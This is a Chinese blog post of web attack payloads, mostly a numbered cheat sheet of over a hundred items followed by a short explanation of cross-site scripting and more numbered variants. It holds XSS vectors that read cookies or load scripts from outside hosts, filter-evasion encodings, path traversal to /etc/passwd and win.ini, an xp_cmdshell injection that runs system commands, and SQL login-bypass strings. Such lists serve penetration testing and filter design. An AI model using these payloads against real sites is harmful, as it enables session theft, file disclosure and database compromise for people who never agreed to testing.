XSS跨站测试代码大全

  1. '><script>alert(document.cookie)</script>  
  2. ='><script>alert(document.cookie)</script>  
  3. <script>alert(document.cookie)</script>  
  4. <script>alert(vulnerable)</script>  
  5. %3Cscript%3Ealert('XSS')%3C/script%3E  
  6. <script>alert('XSS')</script>  
  7. <img src="javascript:alert('XSS')">  
  8. %0a%0a<script>alert(\"Vulnerable\")</script>.jsp  
  9. %22%3cscript%3ealert(%22xss%22)%3c/script%3e  
  10. %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  
  11. %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini  
  12. %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e  
  13. %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e  
  14. %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html  
  15. %3f.jsp  
  16. %3f.jsp  
  17. <script>alert('Vulnerable');</script>  
  18. <script>alert('Vulnerable')</script>  
  19. ?sql_debug=1  
  20. a%5c.aspx  
  21. a.jsp/<script>alert('Vulnerable')</script>  
  22. a/  
  23. a?<script>alert('Vulnerable')</script>  
  24. "><script>alert('Vulnerable')</script>  
  25. ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&  
  26. %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  27. %3Cscript%3Ealert(document. domain);%3C/script%3E&  
  28. %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=  
  29. 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=  
  30. http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd  
  31. ..\..\..\..\..\..\..\..\windows\system.ini  
  32. \..\..\..\..\..\..\..\..\windows\system.ini  
  33. '';!--"<XSS>=&{()}  
  34. <IMG src="javascript:alert('XSS');">  
  35. <IMG src=javascript:alert('XSS')>  
  36. <IMG src=JaVaScRiPt:alert('XSS')>  
  37. <IMG src=JaVaScRiPt:alert("XSS")>  
  38. <IMG src=javascript:alert('XSS')>  
  39. <IMG src=javascript:alert('XSS')>  
  40. <IMG src=javascript:alert('XSS')>  
  41. <IMG src="jav ascript:alert('XSS');">  
  42. <IMG src="jav ascript:alert('XSS');">  
  43. <IMG src="jav ascript:alert('XSS');">  
  44. "<IMG src=java\0script:alert(\"XSS\")>";' > out  
  45. <IMG src=" javascript:alert('XSS');">  
  46. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>  
  47. <BODY BACKGROUND="javascript:alert('XSS')">  
  48. <BODY ONLOAD=alert('XSS')>  
  49. <IMG DYNSRC="javascript:alert('XSS')">  
  50. <IMG LOWSRC="javascript:alert('XSS')">  
  51. <BGSOUND src="javascript:alert('XSS');">  
  52. <br size="&{alert('XSS')}">  
  53. <LAYER src="http://xss.ha.ckers.org/a.js"></layer>  
  54. <LINK REL="stylesheet" href="javascript:alert('XSS');">  
  55. <IMG src='vbscript:msgbox("XSS")'>  
  56. <IMG src="mocha:[code]">  
  57. <IMG src="livescript:[code]">  
  58. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">  
  59. <IFRAME src=javascript:alert('XSS')></IFRAME>  
  60. <FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>  
  61. <TABLE BACKGROUND="javascript:alert('XSS')">  
  62. <DIV STYLE="background-image: url(javascript:alert('XSS'))">  
  63. <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">  
  64. <DIV STYLE="width: expression(alert('XSS'));">  
  65. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>  
  66. <IMG STYLE='xss:expre\ssion(alert("XSS"))'>  
  67. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>  
  68. <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>  
  69. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>  
  70. <BASE href="javascript:alert('XSS');//">  
  71. getURL("javascript:alert('XSS')")  
  72. a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);  
  73. <XML src="javascript:alert('XSS');">  
  74. "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"  
  75. <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>  
  76. <IMG src="javascript:alert('XSS')"  
  77. <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->  
  78. <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">  
  79. <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  80. <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  81. <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  82. <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  83. <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
  84. <A href=http://www.gohttp://www.google.com/ogle.com/>link</A>  
  85. admin'--  
  86. ' or 0=0 --  
  87. " or 0=0 --  
  88. or 0=0 --  
  89. ' or 0=0 #  
  90. " or 0=0 #  
  91. or 0=0 #  
  92. ' or 'x'='x  
  93. " or "x"="x  
  94. ') or ('x'='x  
  95. ' or 1=1--  
  96. " or 1=1--  
  97. or 1=1--  
  98. ' or a=a--  
  99. " or "a"="a  
  100. ') or ('a'='a  
  101. ") or ("a"="a  
  102. hi" or "a"="a  
  103. hi" or 1=1 --  
  104. hi' or 1=1 --  
  105. hi' or 'a'='a  
  106. hi') or ('a'='a  
  107. hi") or ("a"="a

XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被骇客用来编写危害性更大的phishing攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击“,而JavaScript是新型的“ShellCode”。

下面是几种常用的XSS攻击代码:

(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3)IMG标签无分号无引号
<IMG SRC=javascript:alert(‘XSS’)>

(4)IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

(5)HTML编码(必须有分号)
<IMG SRC=javascript:alert(“XSS”)>

(6)修正缺陷IMG标签
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S')>

(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>

(10)十六进制编码也是没有分号(计算器)
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>

(11)嵌入式标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(12)嵌入式编码标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(13)嵌入式换行符
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(14)嵌入式回车
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<IMG SRC=”javascript:alert(‘XSS‘)”>

(16)解决限制字符(要求同页面)
<script>z=’document.’</script>
<script>z=z+’write(“‘</script>


  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值